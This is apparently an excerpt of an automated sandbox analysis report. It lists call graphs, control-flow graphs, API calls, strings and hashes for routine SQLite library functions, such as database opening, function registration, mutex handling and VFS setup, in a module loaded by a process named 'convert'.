calls 24496->24647 24497->24476 24502 61e8f9c1 sqlite3_create_function 24497->24502 24498 61e90117 sqlite3_wal_autocheckpoint 24498->24447 24507 61e900bf 24500->24507 24511 61e9006c sqlite3_create_window_function 24500->24511 24502->24476 24509 61e8fa0b 24502->24509 24503 61e8fd1e 24510 61e90172 24503->24510 24644 61e1af62 8 API calls 24503->24644 24504 61e8fc27 sqlite3_mutex_leave 24506 61e8fc75 sqlite3_free 24504->24506 24504->24518 24505->24495 24512 61e8fc89 24506->24512 24506->24518 24507->24484 24520 61e900ca sqlite3_create_module 24507->24520 24508 61e8ffce 24508->24495 24648 61e27dff 15 API calls 24508->24648 24517 61e8fa25 sqlite3_create_function 24509->24517 24528 61e8fa69 24509->24528 24650 61e09fe9 sqlite3_free sqlite3_free sqlite3_free 24510->24650 24511->24500 24512->24479 24514 61e8fd3e 24514->24510 24645 61e1af62 8 API calls 24514->24645 24517->24509 24518->24476 24518->24479 24518->24494 24518->24504 24518->24506 24642 61e2b4a0 11 API calls 24518->24642 24519 61e90181 sqlite3_free 24519->24477 24520->24507 24523 61e8fd5e 24523->24510 24524 61e8fd66 sqlite3_create_function 24523->24524 24524->24510 24525 61e8fdac sqlite3_create_function 24524->24525 24525->24510 24526 61e8fdf2 sqlite3_overload_function 24525->24526 24526->24510 24527 61e8fe14 sqlite3_overload_function 24526->24527 24527->24510 24530 61e8fe36 sqlite3_overload_function 24527->24530 24528->24476 24641 61e27dff 15 API calls 24528->24641 24530->24510 24532 61e8fe58 sqlite3_overload_function 24530->24532 24531 61e8fb35 24531->24476 24533 61e8fb3f sqlite3_create_function 24531->24533 24532->24510 24534 61e8fe7a sqlite3_overload_function 24532->24534 24533->24477 24535 61e8fb88 sqlite3_create_function 24533->24535 24534->24510 24536 61e8fe9c 24534->24536 24535->24518 24646 61e27dff 15 API calls 24536->24646 24538 61e8feb8 24538->24477 24649 61e27dff 15 API calls 24538->24649 24540 61e90145 24540->24477 24541 61e9014f sqlite3_create_module 24540->24541 24541->24477 24542->24423 24651 61e10775 24543->24651 24547 61e2b9cd 24546->24547 24548 61e11c6e 11 API calls 24547->24548 24549 61e2b9f6 24548->24549 24552 61e2ba5a 24549->24552 24556 61e2b9fc 24549->24556 24550 61e11c6e 11 API calls 24551 61e2ba0f 24550->24551 24553 61e2ba44 24551->24553 24555 61e0fc18 sqlite3_free 24551->24555 24665 61e2b4a0 11 API calls 24552->24665 24553->24439 24555->24553 24556->24550 24558 61e11cfc 24557->24558 24559 61e11c81 24557->24559 24558->24450 24558->24451 24559->24558 24666 61e11acf 10 API calls 24559->24666 24561 61e11ce6 24561->24558 24667 61e0f612 sqlite3_free 24561->24667 24564 61e46ae1 strcmp 24563->24564 24565 61e46b0b 24563->24565 24564->24565 24598 61e46e27 24564->24598 24566 61e11e9d 6 API calls 24565->24566 24565->24598 24573 61e46b6b 24566->24573 24567 61e11e9d 6 API calls 24568 61e46ff4 24567->24568 24570 61e4700c 24568->24570 24571 61e46ffa 24568->24571 24569 61e47777 24569->24460 24569->24461 24588 61e47113 24570->24588 24673 61e0f612 sqlite3_free 24570->24673 24672 61e0f612 sqlite3_free 24571->24672 24573->24569 24581 61e10775 6 API calls 24573->24581 24605 61e46dab 24573->24605 24574 61e11e9d 6 API calls 24582 61e46dc3 24574->24582 24575 61e471dc 24674 61e139cb 15 API calls 24575->24674 24576 61e47007 24580 61e47612 sqlite3_free sqlite3_free 24576->24580 24677 61e469cd 60 API calls 24576->24677 24578 61e4760d 24578->24580 24618 61e475c9 24580->24618 24584 61e46bfe 24581->24584 24582->24578 24593 61e10775 6 API calls 24582->24593 24582->24598 24586 61e46c14 sqlite3_free 24584->24586 24587 61e46c26 24584->24587 24585 61e4766d sqlite3_mutex_leave 24585->24569 24586->24569 24590 61e46c2f 24587->24590 24596 61e46c60 sqlite3_free sqlite3_free 24587->24596 24588->24575 24589 61e4723f 24588->24589 24591 61e471b3 sqlite3_uri_boolean 24588->24591 24600 61e46f67 24589->24600 24675 61e0ab1c sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 24589->24675 24597 61e46c91 sqlite3_mutex_enter 24590->24597 24591->24575 24595 61e471e2 sqlite3_uri_boolean 24591->24595 24613 61e46e8f 24593->24613 24594 61e472e0 sqlite3_free 24594->24600 24595->24575 24596->24569 24668 61e01713 24597->24668 24598->24567 24598->24576 24600->24576 24606 61e014e3 17 API calls 24600->24606 24611 61e47402 24600->24611 24602 61e46cb8 24603 61e46d8e sqlite3_mutex_leave sqlite3_free 24602->24603 24604 61e46ccb strcmp 24602->24604 24610 61e46cfb 24602->24610 24603->24605 24621 61e47523 24603->24621 24604->24602 24605->24574 24606->24611 24607 61e13056 3 API calls 24607->24618 24608 61e46d6c 24608->24603 24609 61e46f5a 24671 61e0f612 sqlite3_free 24609->24671 24610->24608 24615 61e46d30 sqlite3_mutex_leave sqlite3_mutex_leave sqlite3_free sqlite3_free 24610->24615 24611->24576 24622 61e476d6 24611->24622 24676 61e139cb 15 API calls 24611->24676 24613->24576 24613->24598 24613->24609 24670 61e2ab6e sqlite3_log 24613->24670 24615->24569 24616 61e474e8 24616->24576 24616->24621 24616->24622 24618->24569 24618->24585 24619 61e46f48 24619->24598 24619->24609 24620 61e47719 sqlite3_mutex_enter sqlite3_mutex_leave 24620->24622 24621->24607 24622->24576 24622->24620 24624 61e1620e 24623->24624 24626 61e1621a 24623->24626 24625 61e13056 3 API calls 24624->24625 24625->24626 24626->24468 24629 61e0fbee 24627->24629 24628 61e0fc2e sqlite3_overload_function 24628->24473 24628->24474 24629->24627 24629->24628 24678 61e0fba7 sqlite3_free 24629->24678 24632 61e13565 24631->24632 24633 61e135a4 sqlite3_free 24632->24633 24634 61e135b2 24632->24634 24636 61e135e4 24632->24636 24633->24634 24635 61e10775 6 API calls 24634->24635 24634->24636 24635->24636 24636->24498 24637->24454 24638->24454 24639->24462 24640->24487 24641->24531 24642->24506 24643->24503 24644->24514 24645->24523 24646->24538 24647->24508 24648->24495 24649->24540 24650->24519 24652 61e10791 24651->24652 24653 61e10865 24651->24653 24652->24653 24654 61e107ac sqlite3_mutex_enter 24652->24654 24653->24429 24657 61e107c2 24654->24657 24655 61e10819 24661 61e29053 malloc 24655->24661 24656 61e10854 sqlite3_mutex_leave 24656->24653 24657->24655 24664 61e09d6d sqlite3_mutex_leave sqlite3_mutex_enter 24657->24664 24659 61e1082e 24659->24656 24662 61e29079 sqlite3_log 24661->24662 24663 61e2906c 24661->24663 24662->24663 24663->24659 24664->24655 24665->24553 24666->24561 24667->24558 24669 61e0171c sqlite3_mutex_enter 24668->24669 24669->24602 24670->24619 24671->24600 24672->24576 24673->24588 24674->24589 24675->24594 24676->24616 24677->24578 24678->24629 24679 61e1882f 24680 61e18b79 24679->24680 24681 61e1883e 24679->24681 24681->24680 24682 61e18860 sqlite3_mutex_enter 24681->24682 24683 61e18882 24682->24683 24689 61e1889f 24682->24689 24685 61e1888b sqlite3_config 24683->24685 24683->24689 24684 61e1894c sqlite3_mutex_leave sqlite3_mutex_enter 24686 61e18b1a sqlite3_mutex_leave sqlite3_mutex_enter 24684->24686 24692 61e18977 24684->24692 24685->24689 24687 61e18b41 sqlite3_mutex_free 24686->24687 24688 61e18b58 sqlite3_mutex_leave 24686->24688 24687->24688 24688->24680 24689->24684 24690 61e18904 sqlite3_mutex_leave 24689->24690 24690->24680 24692->24686 24693 61e189e3 sqlite3_malloc 24692->24693 24695 61e18a10 sqlite3_config 24692->24695 24696 61e18a24 24692->24696 24694 61e18a3e sqlite3_free sqlite3_os_init 24693->24694 24697 61e18a02 24693->24697 24694->24697 24695->24696 24696->24693 24696->24697 24697->24686 24698 61e18c7e GetSystemInfo sqlite3_vfs_register sqlite3_vfs_register sqlite3_vfs_register sqlite3_vfs_register 24699 61e18cf9 24698->24699

                                                                                                  Executed Functions

                                                                                                  Function 61E8F4D3 Relevance: 102.3, APIs: 39, Strings: 19, Instructions: 765COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 61e8f4d3-61e8f503 sqlite3_initialize 1 61e8f509-61e8f515 0->1 2 61e901e7-61e901f1 0->2 3 61e8f52d-61e8f532 1->3 4 61e8f517-61e8f51a 1->4 6 61e8f53b-61e8f542 3->6 7 61e8f534-61e8f539 3->7 4->3 5 61e8f51c-61e8f526 4->5 5->3 9 61e8f54c-61e8f563 call 61e11e9d 6->9 10 61e8f544 6->10 8 61e8f549 7->8 8->9 13 61e901d9-61e901db 9->13 14 61e8f569-61e8f56b 9->14 10->8 17 61e9019c-61e901a9 sqlite3_errcode 13->17 15 61e8f58b-61e8f71c sqlite3_mutex_enter call 61e2b996 * 5 14->15 16 61e8f56d-61e8f57c call 61e01713 14->16 35 61e90191-61e90197 sqlite3_mutex_leave 15->35 36 61e8f722-61e8f74e call 61e11c6e 15->36 16->15 26 61e8f57e-61e8f586 sqlite3_free 16->26 20 61e901ab-61e901b5 sqlite3_close 17->20 21 61e901b7-61e901b9 17->21 24 61e901c2-61e901d7 sqlite3_free 20->24 21->24 25 61e901bb 21->25 24->2 25->24 26->13 35->17 39 61e8f75c-61e8f776 call 61e38ca4 36->39 40 61e8f750-61e8f75a call 61e27c83 36->40 44 61e8f77b-61e8f77f 39->44 40->44 45 61e8f781-61e8f784 44->45 46 61e8f7c3-61e8f7ec call 61e46abf 44->46 47 61e8f78d-61e8f7be call 61e2b4a0 sqlite3_free 45->47 48 61e8f786-61e8f788 call 61e0a6b0 45->48 53 61e8f809-61e8f82b call 61e13056 call 61e161ff 46->53 54 61e8f7ee-61e8f804 call 61e0fc18 46->54 47->35 48->47 62 61e8f82d-61e8f833 53->62 63 61e8f836-61e8f873 call 61e0afe0 call 61e161ff 53->63 54->35 62->63 63->35 68 61e8f879-61e8f89d call 61e0fc18 sqlite3_overload_function 63->68 71 61e8f89f-61e8f8a1 call 61e0a6b0 68->71 72 61e8f8a6-61e8f8b4 sqlite3_errcode 68->72 71->72 74 61e8fbc9-61e8fbcb 72->74 75 61e8f8ba-61e8f8bc 72->75 76 61e8fc8e-61e8fc92 74->76 77 61e8fbd1-61e8fbd8 74->77 78 61e8fec2-61e8fec6 75->78 79 61e8f8c2-61e8f8d6 sqlite3_malloc 75->79 76->78 84 61e8fc98-61e8fc9a 76->84 80 61e8fbda-61e8fbe6 sqlite3_errcode 77->80 81 61e8fbf1-61e8fbf6 77->81 85 61e8fecc-61e8fece 78->85 86 61e8fff6-61e8fffa 78->86 82 61e901dd-61e901e2 79->82 83 61e8f8dc-61e8f92b call 61e27dff 79->83 80->35 88 61e8fbec 80->88 91 61e8fbf8-61e8fc16 call 61e01713 sqlite3_mutex_enter 81->91 82->78 83->76 103 61e8f931-61e8f975 sqlite3_create_function 83->103 84->78 90 61e8fca0-61e8fcc4 sqlite3_create_module 84->90 85->86 87 61e8fed4-61e8ff18 sqlite3_create_function 85->87 92 61e90000-61e90002 86->92 93 61e900f5-61e900f7 86->93 87->86 94 61e8ff1e-61e8ff62 sqlite3_create_function 87->94 88->76 90->78 98 61e8fcca-61e8fcdf sqlite3_malloc 90->98 112 61e8fc18-61e8fc21 91->112 113 61e8fc23-61e8fc25 91->113 95 61e900f9-61e900fb call 61e0fc18 92->95 100 61e90008-61e9000d 92->100 93->95 96 61e90100-61e90112 call 61e13552 93->96 94->86 101 61e8ff68-61e8ffac sqlite3_create_function 94->101 95->96 110 61e90117-61e90127 sqlite3_wal_autocheckpoint 96->110 98->86 105 61e8fce5-61e8fd20 call 61e1af62 98->105 107 61e9000f-61e90012 100->107 101->86 108 61e8ffae-61e8ffd2 call 61e27dff 101->108 103->76 109 61e8f97b-61e8f9bb sqlite3_create_function 103->109 128 61e90172 105->128 129 61e8fd26-61e8fd40 call 61e1af62 105->129 114 61e9005c-61e90061 107->114 115 61e90014-61e90016 107->115 108->86 134 61e8ffd4-61e8fff4 call 61e27dff 108->134 109->76 118 61e8f9c1-61e8fa05 sqlite3_create_function 109->118 110->35 120 61e8fc27-61e8fc3e sqlite3_mutex_leave 112->120 113->120 116 61e90063-61e90066 114->116 115->114 121 61e90018-61e9005a sqlite3_create_function 115->121 124 61e90068-61e9006a 116->124 125 61e900bf 116->125 118->76 127 61e8fa0b-61e8fa1a 118->127 122 61e8fc40-61e8fc56 120->122 123 61e8fc75-61e8fc83 sqlite3_free 120->123 121->107 122->123 147 61e8fc58-61e8fc70 call 61e2b4a0 122->147 123->91 133 61e8fc89 123->133 124->125 130 61e9006c-61e900bd sqlite3_create_window_function 124->130 132 61e900c1-61e900c4 125->132 135 61e8fa1c-61e8fa1e 127->135 131 61e90177-61e9018c call 61e09fe9 sqlite3_free 128->131 129->128 145 61e8fd46-61e8fd60 call 61e1af62 129->145 130->116 131->78 132->93 140 61e900c6-61e900c8 132->140 133->80 134->86 142 61e8fa69-61e8fa6b 135->142 143 61e8fa20-61e8fa23 135->143 140->93 149 61e900ca-61e900f3 sqlite3_create_module 140->149 142->76 146 61e8fa71-61e8fa83 142->146 143->142 144 61e8fa25-61e8fa67 sqlite3_create_function 143->144 144->135 145->128 157 61e8fd66-61e8fda6 sqlite3_create_function 145->157 152 61e8fa85-61e8fa87 146->152 147->123 149->132 155 61e8fa89-61e8fa8c 152->155 156 61e8fabb-61e8fabd 152->156 155->156 158 61e8fa8e-61e8fab9 155->158 156->76 159 61e8fac3-61e8fad5 156->159 157->131 160 61e8fdac-61e8fdec sqlite3_create_function 157->160 158->152 161 61e8fad7-61e8fad9 159->161 160->131 162 61e8fdf2-61e8fe0e sqlite3_overload_function 160->162 164 61e8fadb-61e8fade 161->164 165 61e8fb0e-61e8fb10 161->165 162->131 167 61e8fe14-61e8fe30 sqlite3_overload_function 162->167 164->165 168 61e8fae0-61e8fb0c 164->168 165->76 166 61e8fb16-61e8fb39 call 61e27dff 165->166 166->76 174 61e8fb3f-61e8fb82 sqlite3_create_function 166->174 167->131 170 61e8fe36-61e8fe52 sqlite3_overload_function 167->170 168->161 170->131 172 61e8fe58-61e8fe74 sqlite3_overload_function 170->172 172->131 175 61e8fe7a-61e8fe96 sqlite3_overload_function 172->175 174->78 176 61e8fb88-61e8fbc7 sqlite3_create_function 174->176 175->131 177 61e8fe9c-61e8febc call 61e27dff 175->177 176->74 177->78 180 61e90129-61e90149 call 61e27dff 177->180 180->78 183 61e9014f-61e9016d sqlite3_create_module 180->183 183->78
                                                                                                  APIs
                                                                                                  • sqlite3_initialize.SQLITE3 ref: 61E8F4FC
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18866
                                                                                                    • Part of subcall function 61E1882F: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E236D5), ref: 61E1889A
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B72
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E8F581
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E8F596
                                                                                                    • Part of subcall function 61E38CA4: memcmp.MSVCRT ref: 61E38CF2
                                                                                                    • Part of subcall function 61E38CA4: sqlite3_malloc64.SQLITE3 ref: 61E38D26
                                                                                                  • sqlite3_create_function.SQLITE3 ref: 61E8FF0F
                                                                                                  • sqlite3_create_function.SQLITE3 ref: 61E8FF59
                                                                                                  • sqlite3_create_function.SQLITE3 ref: 61E8FFA3
                                                                                                  • sqlite3_create_function.SQLITE3 ref: 61E90053
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E90197
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E8F7B9
                                                                                                    • Part of subcall function 61E09DA3: sqlite3_mutex_enter.SQLITE3 ref: 61E09DC2
                                                                                                  • sqlite3_errcode.SQLITE3 ref: 61E9019F
                                                                                                  • sqlite3_close.SQLITE3 ref: 61E901B0
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E901CD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_create_function$sqlite3_freesqlite3_mutex_enter$sqlite3_mutex_leave$memcmpsqlite3_closesqlite3_configsqlite3_errcodesqlite3_initializesqlite3_malloc64
                                                                                                  • String ID: da$@da$BINARY$NOCASE$RTRIM$`a$`a$fts3$fts4$fts5$fts5vocab$porter$rtree$rtree_i32$simple$unicode61$Ca$sa$sa
                                                                                                  • API String ID: 1097977795-876794609
                                                                                                  • Opcode ID: 8e3bca910cd8baba17016b5a9c0f65a2fa3873b5f202d8509b758b91e6e7e757
                                                                                                  • Instruction ID: 8b8505f072dabdda41a0b713db29cfa77f56f0bb7a5865fea87b2e34fd5c2621
                                                                                                  • Opcode Fuzzy Hash: 8e3bca910cd8baba17016b5a9c0f65a2fa3873b5f202d8509b758b91e6e7e757
                                                                                                  • Instruction Fuzzy Hash: 71721BB0A083428FE740DF65C49535ABBF1BF85348F25CC2DE8998B395D779C8858B82
                                                                                                  Function 61E18C7E Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetSystemInfo.KERNEL32(?,?,61EAA400,?,61E18A4B,?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18C98
                                                                                                  • sqlite3_vfs_register.SQLITE3 ref: 61E18CAE
                                                                                                    • Part of subcall function 61E18C1B: sqlite3_initialize.SQLITE3(?,?,61E18CB3), ref: 61E18C26
                                                                                                    • Part of subcall function 61E18C1B: sqlite3_mutex_enter.SQLITE3(?,?,61E18CB3), ref: 61E18C3E
                                                                                                    • Part of subcall function 61E18C1B: sqlite3_mutex_leave.SQLITE3(?), ref: 61E18C70
                                                                                                  • sqlite3_vfs_register.SQLITE3 ref: 61E18CC2
                                                                                                  • sqlite3_vfs_register.SQLITE3 ref: 61E18CD6
                                                                                                  • sqlite3_vfs_register.SQLITE3 ref: 61E18CEA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_vfs_register$InfoSystemsqlite3_initializesqlite3_mutex_entersqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 3532963230-0
                                                                                                  • Opcode ID: 0ba67b654b2df05829d946372c4bfe9abbccf5f817ae628fee8db0c2c44f91c6
                                                                                                  • Instruction ID: 39ad9906a7738034be70e133fd2074caaee3681ce6db2d97a12eaeaf59ae6a74
                                                                                                  • Opcode Fuzzy Hash: 0ba67b654b2df05829d946372c4bfe9abbccf5f817ae628fee8db0c2c44f91c6
                                                                                                  • Instruction Fuzzy Hash: 0EF030B0519700EBD704AF64C18771EBAE4AFC2708F21C85DE0868B384C775C889AF53
                                                                                                  Function 61E46ABF Relevance: 41.0, APIs: 21, Strings: 2, Instructions: 760stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_enter$strcmp
                                                                                                  • String ID: -journal$@
                                                                                                  • API String ID: 42632313-41206085
                                                                                                  • Opcode ID: ec97abe5e540d0c4739d5f0df203dce5c318fc38bf1efc91040ff62e907a0ff3
                                                                                                  • Instruction ID: c974af6fa06680f4fc67a4d06c946c599437a1b1b1eb0588565ced504671687d
                                                                                                  • Opcode Fuzzy Hash: ec97abe5e540d0c4739d5f0df203dce5c318fc38bf1efc91040ff62e907a0ff3
                                                                                                  • Instruction Fuzzy Hash: AD82D674A04255CFEB20CF68C884B89BBF1BF49308F1985E9D8989B352D774D985CF91
                                                                                                  Function 61E1882F Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 200COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 392 61e1882f-61e18838 393 61e18b80 392->393 394 61e1883e-61e18850 call 61e08b60 392->394 397 61e18856-61e1887c call 61e01713 sqlite3_mutex_enter 394->397 398 61e18b79-61e18b7f 394->398 401 61e18882-61e18889 397->401 402 61e18919-61e1892a 397->402 398->393 405 61e1888b-61e1889a sqlite3_config 401->405 406 61e1889f-61e188c5 call 61e01713 401->406 403 61e1894c-61e18971 sqlite3_mutex_leave sqlite3_mutex_enter 402->403 404 61e1892c-61e18942 call 61e01713 402->404 409 61e18977-61e1897e 403->409 410 61e18b1a-61e18b3f sqlite3_mutex_leave sqlite3_mutex_enter 403->410 404->403 419 61e18944-61e18946 404->419 405->406 417 61e188c7-61e188d1 406->417 418 61e188dc-61e188e6 406->418 409->410 411 61e18984-61e189e1 call 61e102b3 * 4 409->411 413 61e18b41-61e18b4e sqlite3_mutex_free 410->413 414 61e18b58-61e18b65 sqlite3_mutex_leave 410->414 433 61e189e3-61e18a00 sqlite3_malloc 411->433 434 61e18a07-61e18a0e 411->434 413->414 414->398 417->418 421 61e188d3-61e188da 417->421 422 61e188f0-61e18902 418->422 419->403 423 61e18b67 419->423 421->418 421->422 422->402 429 61e18904-61e18914 422->429 425 61e18b6c-61e18b77 sqlite3_mutex_leave 423->425 425->398 429->425 435 61e18a02 433->435 436 61e18a3e-61e18a4f sqlite3_free sqlite3_os_init 433->436 437 61e18a10-61e18a1f sqlite3_config 434->437 438 61e18a24-61e18a36 434->438 439 61e18b10 435->439 436->439 440 61e18a55-61e18a5c 436->440 437->438 438->439 444 61e18a3c 438->444 439->410 441 61e18a62-61e18a75 440->441 442 61e18b06 440->442 445 61e18a77-61e18a7c 441->445 446 61e18a7e-61e18a80 441->446 442->439 444->433 447 61e18a82-61e18aa1 445->447 446->447 448 61e18aa3-61e18aa8 447->448 449 61e18aab-61e18ad2 447->449 448->449 450 61e18ad6-61e18add 449->450 451 61e18adf-61e18aec 450->451 452 61e18aee-61e18af8 450->452 451->450 453 61e18b00 452->453 454 61e18afa 452->454 453->442 454->453
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18866
                                                                                                  • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E236D5), ref: 61E1889A
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18958
                                                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18965
                                                                                                  • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E189F9
                                                                                                  • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E236D5), ref: 61E18A1F
                                                                                                  • sqlite3_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18A41
                                                                                                  • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18A46
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B22
                                                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B2D
                                                                                                  • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B49
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B5E
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B72
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_config$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                                  • String ID: `ha$ha
                                                                                                  • API String ID: 1590227068-2026301772
                                                                                                  • Opcode ID: fe41be9d3b2edaf310056cf993b18eb52420d05c6ac81e00ba047a9a0176a1cb
                                                                                                  • Instruction ID: 48fb1250555eb20f7220d5fff1a1896c7f2fb2f7d909219ec43e1d5708f49501
                                                                                                  • Opcode Fuzzy Hash: fe41be9d3b2edaf310056cf993b18eb52420d05c6ac81e00ba047a9a0176a1cb
                                                                                                  • Instruction Fuzzy Hash: 478130B4E28B418FEB009FA4C455B5977F2BB86318F24882ED9458B384E779C4C9DF51
                                                                                                  Function 61E62092 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 227COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
